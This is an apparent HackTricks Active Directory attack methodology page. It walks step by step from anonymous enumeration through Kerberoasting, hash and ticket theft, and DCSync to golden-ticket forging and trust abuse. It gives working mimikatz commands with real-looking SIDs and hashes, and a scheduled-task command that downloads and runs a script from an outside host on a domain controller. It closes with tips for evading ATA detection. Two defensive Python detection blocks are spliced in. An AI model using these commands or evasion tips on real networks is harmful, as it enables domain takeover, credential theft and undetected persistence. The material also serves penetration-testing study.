If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** 💬 **PEASS & HackTricks telegram group here, or follow me on Twitter** 🐦@carlospolopm.
If you want to share some tricks with the community you can also submit pull requests to [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks) that will be reflected in this book.
Don't forget to give ⭐ on the github to motivate me to continue developing this book.
Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an admin can create a group of users and give them specific access privileges to certain directories on the server. As a network grows, Active Directory provides a way to organize a large number of users into logical groups and subgroups, while providing access control at each level.
The Active Directory structure includes three main tiers: 1) domains, 2) trees, and 3) forests. Several objects (users or devices) that all use the same database may be grouped into a single domain. Multiple domains can be combined into a single group called a tree. Multiple trees may be grouped into a collection called a forest. Each one of these levels can be assigned specific access rights and communication privileges.
Main concepts of an Active Directory:
Active Directory provides several different services, which fall under the umbrella of “Active Directory Domain Services,” or AD DS. These services include:
AD DS is included with Windows Server (including Windows Server 10) and is designed to manage client systems. While systems running the regular version of Windows do not have the administrative features of AD DS, they do support Active Directory. This means any Windows computer can connect to a Windows workgroup, provided the user has the correct login credentials.
From: https://techterms.com/definition/active_directory
To learn how to attack an AD you need a solid understanding of the Kerberos authentication process.
Read this page if you still don't know how it works.
You can take a look at https://wadcoms.github.io/ to get a quick view of which commands you can run to enumerate/exploit an AD.
If you just have access to an AD environment but you don’t have any credentials/sessions you could:
```bash
enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //<DC IP>
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>
```
When an invalid username is requested, the server responds with the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, which lets us determine that the username was invalid. Valid usernames elicit either a TGT in an AS-REP response or the error KRB5KDC_ERR_PREAUTH_REQUIRED, indicating that the user is required to perform pre-authentication.
```bash
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>
msf> use auxiliary/gather/kerberos_enumusers
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq
enum4linux -U 10.10.10.161 | grep 'user:' | sed 's/user:\[//g' | sed 's/\]//g' | awk '{print $1}'
```
You could also use the impacket ASREPRoast script to enumerate valid usernames.
OK, so you already have a valid username but no password. Then try:
For this phase you need to have compromised the credentials or a session of a valid domain account.
If you have some valid credentials or a shell as a domain user, you should remember that the options given before are still options to compromise other users.
Regarding ASREPRoast you can now find every possible vulnerable user, and regarding [Password Spraying](password-spraying.md) you can get a list of all the usernames and try the password of the compromised account (if you know it). It's very easy to obtain all the domain usernames from Windows (`net user /domain`, `Get-DomainUser` or `wmic useraccount get name,sid`). In Linux you can use: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username`
Having compromised an account is a big step to start compromising the whole domain, because you are going to be able to start the Active Directory Enumeration:
Even if this Enumeration section looks small, this is the most important part of all. Access the links (mainly the ones for cmd, PowerShell, PowerView and BloodHound), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.
The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets are encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline.
You can know that a user account is being used as a service because the property “ServicePrincipalName” is not null.
Find more information about this attack in the Kerberoast page.
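As an added defender-side example (not part of the original page or of the tools it lists), here is detection logic over constructed Windows Security-log lines for the two KDC-side traces of the techniques above: bursts of 4768 failures with status 0x6 (the KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN answer exploited for user enumeration) and RC4 service-ticket requests (4769) for user-account SPNs, the Kerberoast pattern. The event field names follow the Windows Security log; the sample lines, IPs and account names are constructed.

```python
import re
from collections import Counter

# Constructed sample Security-log events (not real logs), one per line, reduced to the
# fields the checks need. 4768 = TGT request (AS-REQ), 4769 = service ticket request
# (TGS-REQ). Status 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (the "unknown user" answer the
# enumeration tools above look for); TicketEncryptionType 0x17 = RC4-HMAC, 0x12 = AES256.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=jdoe ServiceName=krbtgt IpAddress=10.10.10.50 Status=0x0 TicketEncryptionType=0x12
EventID=4768 TargetUserName=aaron ServiceName=krbtgt IpAddress=10.10.10.99 Status=0x6 TicketEncryptionType=0xffffffff
EventID=4768 TargetUserName=abby ServiceName=krbtgt IpAddress=10.10.10.99 Status=0x6 TicketEncryptionType=0xffffffff
EventID=4768 TargetUserName=adam ServiceName=krbtgt IpAddress=10.10.10.99 Status=0x6 TicketEncryptionType=0xffffffff
EventID=4768 TargetUserName=alice ServiceName=krbtgt IpAddress=10.10.10.99 Status=0x6 TicketEncryptionType=0xffffffff
EventID=4768 TargetUserName=amy ServiceName=krbtgt IpAddress=10.10.10.99 Status=0x6 TicketEncryptionType=0xffffffff
EventID=4768 TargetUserName=bob ServiceName=krbtgt IpAddress=10.10.10.51 Status=0x6 TicketEncryptionType=0xffffffff
EventID=4769 TargetUserName=jdoe@LAB.LOCAL ServiceName=sqlsvc IpAddress=10.10.10.50 Status=0x0 TicketEncryptionType=0x17
EventID=4769 TargetUserName=jdoe@LAB.LOCAL ServiceName=WS01$ IpAddress=10.10.10.50 Status=0x0 TicketEncryptionType=0x17
EventID=4769 TargetUserName=jdoe@LAB.LOCAL ServiceName=krbtgt IpAddress=10.10.10.50 Status=0x0 TicketEncryptionType=0x17
EventID=4769 TargetUserName=bob@LAB.LOCAL ServiceName=sqlsvc IpAddress=10.10.10.51 Status=0x0 TicketEncryptionType=0x12
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_events(text):
    """Turn 'key=value' event lines into dicts; blank lines are skipped."""
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]

def find_user_enumeration(events, threshold=5):
    """Source IPs with >= threshold 4768 failures carrying Status 0x6 (unknown
    principal): the KDC-side trace of a username-guessing run."""
    unknown = Counter(e["IpAddress"] for e in events
                      if e["EventID"] == "4768" and e["Status"] == "0x6")
    return {ip: n for ip, n in unknown.items() if n >= threshold}

def find_rc4_service_tickets(events):
    """(requester, service account) pairs for 4769 events where an RC4 (0x17) ticket
    was issued for a service run by a user account. Computer accounts (name ends in
    '$') and krbtgt are skipped: they are not the Kerberoast target, while RC4 for a
    user SPN in an AES-capable domain is the downgrade worth alerting on."""
    hits = []
    for e in events:
        if e["EventID"] != "4769" or e["TicketEncryptionType"] != "0x17":
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        hits.append((e["TargetUserName"], svc))
    return hits

if __name__ == "__main__":
    evts = parse_events(SAMPLE_EVENTS)
    print("user enumeration sources:", find_user_enumeration(evts))
    print("RC4 user-SPN tickets:", find_rc4_service_tickets(evts))
```

The threshold and the one-line event format are simplifications; in a real pipeline the same two rules run over the parsed XML of events 4768/4769 per source address and time window.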
If you have compromised credentials or a session as a regular domain user and you have access with this user to any machine in the domain, you should try to find your way to escalate privileges locally. This is because only with admin privileges will you be able to dump hashes of other users in memory (LSASS) and locally (SAM).
There is a complete page in this book about local privilege escalation in Windows and a [checklist](../checklist-windows-privilege-escalation.md). Also, don't forget to try **WinPEAS**.
Once you have obtained some credentials you could check if you have access to any machine using the win-rm service.
More information about how to use and abuse win-rm here.
For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.
Hopefully you have managed to compromise some local admin account using ASREPRoast, Password Spraying, Kerberoast, Responder, EvilSSDP, Enumerating… or escalating privileges locally.
Then, it's time to dump all the hashes in memory and locally.
Read this page about different ways to obtain the hashes.
Once you have the hash of a user, you can use it to impersonate it.
You need to use some tool that will perform the NTLM authentication using that hash, or you could create a new logon session and inject that hash into LSASS, so when any NTLM authentication is performed, that hash will be used. The last option is what mimikatz does.
[More information about this attack and about how NTLM works here.](../ntlm/#pass-the-hash)
This attack aims to use the user NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially useful in networks where NTLM protocol is disabled and only Kerberos is allowed as authentication protocol.
More information about Over Pass the Hash/Pass the Key here.
This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.
[More information about Pass the Ticket here.](pass-the-ticket.md)
If a user has privileges to access MSSQL instances, they may be able to use them to execute commands on the MSSQL host (if it is running as SA).
Also, an MSSQL instance may be trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, they will be able to use the trust relationship to execute queries in the other instance as well. These trusts can be chained, and at some point the user might find a misconfigured database where they can execute commands.
The links between databases work even across forest trusts.
More information about this technique here.
If you find any Computer object with the attribute ADS_UF_TRUSTED_FOR_DELEGATION and you have admin privileges on the computer, you will be able to dump from memory the TGTs of every user who logs on to the computer.
So, if a Domain Admin logs on to the computer, you will be able to dump their TGT and impersonate them using Pass the Ticket.
Thanks to unconstrained delegation you could even automatically compromise a Print Server (hopefully it will be a DC).
More information about this technique here.
If a user or computer is allowed for “Constrained Delegation” it will be able to impersonate any user to access some services in a computer.
Then, if you compromise the hash of this user/computer you will be able to impersonate any user (even domain admins) to access some services.
More information about these attacks and some constraints here.
The compromised user could have some interesting privileges over some domain objects that could let you move laterally/escalate privileges.
More information about interesting privileges here.****
If you can find any Spool service listening inside the domain, you may be able to abuse it to obtain new credentials and escalate privileges.
More information about how to find and abuse Spooler services here.
Once you get Domain Admin privileges, you can dump all the domain database.
```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```
More information about DCSync attack can be found here.
More information about how to steal the NTDS.dit (Domain database) can be found here.
Some of the techniques discussed before can be used for persistence. For example you could make a user vulnerable to ASREPRoast or to Kerberoast.
A valid TGT as any user can be created using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of a TGS is being able to access any service (or machine) in the domain as the impersonated user.
More information about Golden Ticket here.
The Silver Ticket attack is based on crafting a valid TGS for a service once the NTLM hash of the service is owned (like the PC account hash). Thus, it is possible to gain access to that service by forging a custom TGS as any user (like privileged access to a computer).
More information about Silver Ticket here.
The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all “protected groups” in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
By default, the ACL of this object is copied to all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the AdminSDHolder object, for example giving full permissions to a regular user, this user will have full permissions on all the protected groups (within an hour).
And if someone tries to delete this user from the Domain Admins (for example), within an hour or less the user will be back in the group.
[More information about AdminSDHolder Group here.](privileged-accounts-and-token-privileges.md#adminsdholder-group)
There is a local administrator account inside each DC. Having admin privileges on this machine, you can use mimikatz to dump the local Administrator hash. Then, by modifying a registry key you can activate this password so you can remotely access this local Administrator account.
[More information about DSRM Credentials here.](dsrm-credentials.md)
You could give some special permissions to a user over some specific domain objects that will let the user escalate privileges in the future.
More information about interesting privileges here.
Security descriptors are used to store the permissions an object has over another object. If you can make just a small change in the security descriptor of an object, you can obtain very interesting privileges over that object without needing to be a member of a privileged group.
[More information about Security Descriptors here.](security-descriptors.md)
Modify LSASS in memory to create a master password that will work for any account in the domain.
More information about Skeleton Key here.
Learn what is a SSP (Security Support Provider) here.
You can create your own SSP to capture in clear text the credentials used to access the machine.
[More information about Custom SSP here.](custom-ssp.md)
This technique (DCShadow) registers a new Domain Controller in the AD and uses it to push attributes (SIDHistory, SPNs…) on specified objects without leaving any logs regarding the modifications. You need DA privileges and to be inside the root domain.
Note that if you use wrong data, pretty ugly logs will appear.
[More information about DCShadow here.](dcshadow.md)
Microsoft considers that the domain isn't a security boundary; the forest is the security boundary. This means that if you compromise a domain inside a forest you are going to be able to compromise the entire forest.
At a high level, a domain trust establishes the ability for users in one domain to authenticate to resources or act as a security principal in another domain.
Essentially, all a trust does is linking up the authentication systems of two domains and allowing authentication traffic to flow between them through a system of referrals.
When 2 domains trust each other they exchange keys. These keys are saved in the DCs of each domain (1 key per trust direction) and they are the base of the trust.
When a user tries to access a service in the trusting domain, it requests an inter-realm TGT from the DC of its own domain. The DC serves the client this TGT, which is encrypted/signed with the inter-realm key (the key both domains exchanged). Then the client contacts the DC of the other domain and requests a TGS for the service using the inter-realm TGT. The DC of the trusting domain checks the key used and, if it is OK, trusts everything in that ticket and serves the TGS to the client.
It's important to notice that a trust can be one-way or two-way. In a two-way trust both domains trust each other, but in a one-way trust one of the domains is the trusted domain and the other the trusting domain. In the latter case, you will only be able to access resources inside the trusting domain from the trusted one.
A trust relationship can also be transitive (A trusts B, B trusts C, then A trusts C) or non-transitive.
Different trusting relationships:
There are three main ways that security principals (users/groups/computer) from one domain can have access into resources in another foreign/trusting domain:
Also, notice that there are 2 trust keys, one for Child –> Parent and another one for Parent –> Child.
```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:7ef5be456dc8d7450fb8f5f7348746c5 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
```
```
/domain:<Current domain>
/sid:<SID of current domain>
/sids:<SID of the Enterprise Admins group of the parent domain>
/rc4:<Trusted key>
/user:Administrator
/service:<target service>
/target:<Other domain>
/ticket:C:\path\save\ticket.kirbi
```
To find the SID of the "Enterprise Admins" group, take the SID of the root domain and append -519 to it (S-1-5-21-<root domain>-519). For example, from the root domain SID `S-1-5-21-280534878-1496970234-700767426` the "Enterprise Admins" group SID is `S-1-5-21-280534878-1496970234-700767426-519`.
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
```powershell
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$
```
Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
```
In this case you can sign with the trusted key a TGT impersonating the Administrator user of the current domain. In this case you won’t always get Domain Admins privileges in the external domain, but only the privileges the Administrator user of your current domain was given in the external domain.
```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
```
SID Filtering:
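As an added example (not from the original page or from mimikatz), a simplified model of the SID-filtering check that a trusting domain applies to an inter-realm ticket, using the child and root domain SIDs from the commands above. The Enterprise Admins SID is derived as described earlier (root domain SID plus RID 519); the helper names are my own, and real DCs apply further rules (well-known SIDs, quarantine flags) beyond the core one modelled here.

```python
import re

# Values taken from the trust commands on this page: the compromised child domain and
# the root domain whose "Enterprise Admins" SID an attacker would try to inject via /sids.
CHILD_DOMAIN_SID = "S-1-5-21-1874506631-3219952063-538504511"
ROOT_DOMAIN_SID = "S-1-5-21-280534878-1496970234-700767426"
ENTERPRISE_ADMINS_RID = 519

# Domain-style SID: S-1-5-21-<three sub-authorities>, optionally followed by a RID.
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}(?:-(\d+))?$")

def enterprise_admins_sid(root_domain_sid):
    """Group SID = root domain SID with the well-known RID 519 appended."""
    return f"{root_domain_sid}-{ENTERPRISE_ADMINS_RID}"

def domain_part(sid):
    """'S-1-5-21-a-b-c-RID' -> 'S-1-5-21-a-b-c'; a bare domain SID is returned unchanged."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain-style SID: {sid}")
    return sid if m.group(1) is None else sid[: -len(m.group(1)) - 1]

def sid_filter(trusted_domain_sid, ticket_sids):
    """Core SID-filtering rule on a ticket arriving over a trust: keep only SIDs that
    belong to the domain the ticket came from and drop every other SID (for instance a
    foreign Enterprise Admins SID smuggled in through SIDHistory / the /sids option).
    Returns (kept, dropped) so the dropped list can be logged as a signal."""
    kept, dropped = [], []
    for sid in ticket_sids:
        (kept if domain_part(sid) == trusted_domain_sid else dropped).append(sid)
    return kept, dropped

if __name__ == "__main__":
    # Ticket claiming to be the child-domain Administrator (RID 500) plus the root
    # domain's Enterprise Admins SID; filtering keeps the first and strips the second.
    forged = [f"{CHILD_DOMAIN_SID}-500", enterprise_admins_sid(ROOT_DOMAIN_SID)]
    print(sid_filter(CHILD_DOMAIN_SID, forged))
```

Filtering is what makes the /sids trick fail across forest trusts; inside a forest, parent/child trusts do not filter, which is why the page treats the forest as the boundary.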
More information about domain trusts in ired.team.
Learn more about how to protect credentials here.
Please, find some mitigations against each technique in the description of the technique.
```powershell
Add-ADGroupMember -Identity 'Domain Admins' -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)
```
```powershell
Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
```
For user objects:
General:
ATA only complains when you try to enumerate sessions in the DC, so if you don’t look for sessions in the DC but in the rest of the hosts, you probably won’t get detected.
Always create the tickets using the aes keys also because what ATA identifies as malicious is the degradation to NTLM.
If you don’t execute this from a Domain Controller, ATA is going to catch you, sorry.